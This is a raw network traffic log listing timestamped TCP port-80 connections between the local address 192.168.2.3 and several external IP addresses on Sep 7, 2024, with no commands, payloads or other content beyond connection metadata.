                                                                                                                                                                                                            Sep 7, 2024 15:34:34.490202904 CEST6136380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.495127916 CEST806136345.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.495274067 CEST6136380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.495383024 CEST6136380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.499588013 CEST6136480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.500489950 CEST806136345.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.500617981 CEST6136380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.504522085 CEST8061364172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.504625082 CEST6136480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.507396936 CEST6136480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.512191057 CEST8061364172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.984854937 CEST8061364172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.984880924 CEST8061364172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.984935999 CEST6136480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.985023975 CEST6136480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.986895084 CEST6136280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.987190962 CEST6136580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.991986990 CEST8061362172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.992024899 CEST8061365172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.992041111 CEST6136280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.992094994 CEST6136580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.992314100 CEST6136580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.997107983 CEST8061365172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.500749111 CEST8061365172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.500891924 CEST6136580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.613082886 CEST6136680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.617985964 CEST806136645.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.618093967 CEST6136680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.633392096 CEST6136680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.638483047 CEST806136645.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.638545036 CEST6136680192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.639659882 CEST6136780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.644542933 CEST8061367172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.644625902 CEST6136780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.647886038 CEST6136780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.653875113 CEST8061367172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.135874033 CEST8061367172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.136162043 CEST6136780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.136171103 CEST8061367172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.136226892 CEST6136780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.136600971 CEST6136580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.136998892 CEST6136880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.141897917 CEST8061365172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.141941071 CEST8061368172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.141997099 CEST6136580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.142059088 CEST6136880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.142235994 CEST6136880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.147037983 CEST8061368172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.722342968 CEST8061368172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.722424984 CEST6136880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.309804916 CEST6136980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.314734936 CEST806136964.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.314826965 CEST6136980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.314976931 CEST6136980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.318837881 CEST6137080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.319880962 CEST806136964.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.319962025 CEST6136980192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.325097084 CEST8061370172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.325182915 CEST6137080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.335453033 CEST6137080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.341696978 CEST8061370172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.808603048 CEST8061370172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.808644056 CEST8061370172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.808770895 CEST6137080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.808865070 CEST6137080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.814475060 CEST6136880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.814809084 CEST6137180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.819576979 CEST8061368172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.819607019 CEST8061371172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.819652081 CEST6136880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.819730997 CEST6137180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.820116043 CEST6137180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.824872971 CEST8061371172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.300848961 CEST8061371172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.301067114 CEST6137180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.434923887 CEST6137280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.439718962 CEST806137264.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.439796925 CEST6137280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.439950943 CEST6137280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.443675995 CEST6137380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.444941044 CEST806137264.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.445008993 CEST6137280192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.448487997 CEST8061373172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.448556900 CEST6137380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.460485935 CEST6137380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.465338945 CEST8061373172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.930893898 CEST8061373172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.930933952 CEST8061373172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.931046009 CEST6137380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.931145906 CEST6137380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.931485891 CEST6137180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.931848049 CEST6137480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.936522007 CEST8061371172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.936589003 CEST8061374172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.936590910 CEST6137180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.936655998 CEST6137480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.936824083 CEST6137480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.941685915 CEST8061374172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.427748919 CEST8061374172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.427839041 CEST6137480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.549658060 CEST6137580192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.554739952 CEST806137545.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.554833889 CEST6137580192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.554960966 CEST6137580192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.558830023 CEST6137680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.560128927 CEST806137545.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.560211897 CEST6137580192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.568696976 CEST8061376172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.568803072 CEST6137680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.568931103 CEST6137680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.573700905 CEST8061376172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.083467960 CEST8061376172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.083487034 CEST8061376172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.083621025 CEST6137680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.083723068 CEST6137680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.084438086 CEST6137780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.084517002 CEST6137480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.089283943 CEST8061377172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.089365959 CEST6137780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.089495897 CEST6137780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.094309092 CEST8061377172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.094544888 CEST8061374172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.094619036 CEST6137480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.571827888 CEST8061377172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.571897984 CEST6137780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.753102064 CEST6137880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.757920027 CEST806137845.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.757993937 CEST6137880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.758094072 CEST6137880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.762782097 CEST6137980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.763235092 CEST806137845.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.763297081 CEST6137880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.767667055 CEST8061379172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.767730951 CEST6137980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.772919893 CEST6137980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.777862072 CEST8061379172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.254594088 CEST8061379172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.254710913 CEST8061379172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.254774094 CEST6137980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.254817009 CEST6137980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.260637045 CEST6137780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.260967970 CEST6138080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.265729904 CEST8061380172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.265750885 CEST8061377172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.265805006 CEST6138080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.265834093 CEST6137780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.266042948 CEST6138080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.271270990 CEST8061380172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.768011093 CEST8061380172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.768083096 CEST6138080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.814966917 CEST6138180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.819806099 CEST806138145.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.819863081 CEST6138180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.820218086 CEST6138180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.825186968 CEST806138145.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.825241089 CEST6138180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.833452940 CEST6138280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.838268995 CEST8061382172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.838335037 CEST6138280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.851108074 CEST6138280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.856162071 CEST8061382172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.325655937 CEST8061382172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.325701952 CEST8061382172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.325793028 CEST6138280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.325849056 CEST6138280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.329689980 CEST6138080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.329986095 CEST6138380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.334769011 CEST8061383172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.334815025 CEST8061380172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.334836960 CEST6138380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.334872961 CEST6138080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.334979057 CEST6138380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.339716911 CEST8061383172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.821847916 CEST8061383172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.821950912 CEST6138380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.943394899 CEST6138480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.948323011 CEST806138488.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.948394060 CEST6138480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.960429907 CEST6138480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.965312958 CEST806138488.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.965394020 CEST6138480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.965527058 CEST6138580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.970308065 CEST8061385172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.970514059 CEST6138580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.970654964 CEST6138580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.975400925 CEST8061385172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.473460913 CEST8061385172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.473573923 CEST8061385172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.473690987 CEST6138580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.473783016 CEST6138580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.474045992 CEST6138380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.474340916 CEST6138680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.479129076 CEST8061383172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.479141951 CEST8061386172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.479212999 CEST6138380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.479252100 CEST6138680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.479403973 CEST6138680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.484123945 CEST8061386172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.972366095 CEST8061386172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.972475052 CEST6138680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.365840912 CEST6138880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.370642900 CEST806138845.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.370743036 CEST6138880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.370865107 CEST6138880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.375386000 CEST6138980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.375758886 CEST806138845.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.375828028 CEST6138880192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.380178928 CEST8061389172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.380245924 CEST6138980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.380371094 CEST6138980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.385127068 CEST8061389172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.870134115 CEST8061389172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.873245001 CEST8061389172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.873363972 CEST6138980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.873462915 CEST6138980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.878840923 CEST6138680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.879159927 CEST6139080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.884445906 CEST8061386172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.884459972 CEST8061390172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.884532928 CEST6138680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.884587049 CEST6139080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.884815931 CEST6139080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.889566898 CEST8061390172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.366652966 CEST8061390172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.366734028 CEST6139080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.941119909 CEST6139180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.946435928 CEST806139188.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.946537971 CEST6139180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.960411072 CEST6139180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.964148998 CEST6139280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.965518951 CEST806139188.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.965585947 CEST6139180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.969028950 CEST8061392172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.969098091 CEST6139280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.976265907 CEST6139280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.982455969 CEST8061392172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554553032 CEST8061392172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554574013 CEST8061392172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554601908 CEST8061392172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554687023 CEST6139280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554737091 CEST6139280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554826975 CEST6139280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.555206060 CEST6139080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.555579901 CEST6139380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.560257912 CEST8061390172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.560339928 CEST6139080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.560362101 CEST8061393172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.560439110 CEST6139380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.560602903 CEST6139380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.565340996 CEST8061393172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.160300970 CEST8061393172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.160381079 CEST6139380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.821965933 CEST6139480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.826879978 CEST806139488.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.826956034 CEST6139480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.827080965 CEST6139480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.830707073 CEST6139580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.832269907 CEST806139488.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.832334995 CEST6139480192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.835521936 CEST8061395172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.835596085 CEST6139580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.835665941 CEST6139580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.840559006 CEST8061395172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.315468073 CEST8061395172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.315486908 CEST8061395172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.315567970 CEST6139580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.315682888 CEST6139580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.321044922 CEST6139380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.321361065 CEST6139680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.326354027 CEST8061393172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.326432943 CEST6139380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.326452017 CEST8061396172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.326528072 CEST6139680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.326698065 CEST6139680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.331511974 CEST8061396172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.866570950 CEST8061396172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.866689920 CEST6139680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.990659952 CEST6139780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.995781898 CEST806139788.198.29.97192.168.2.3
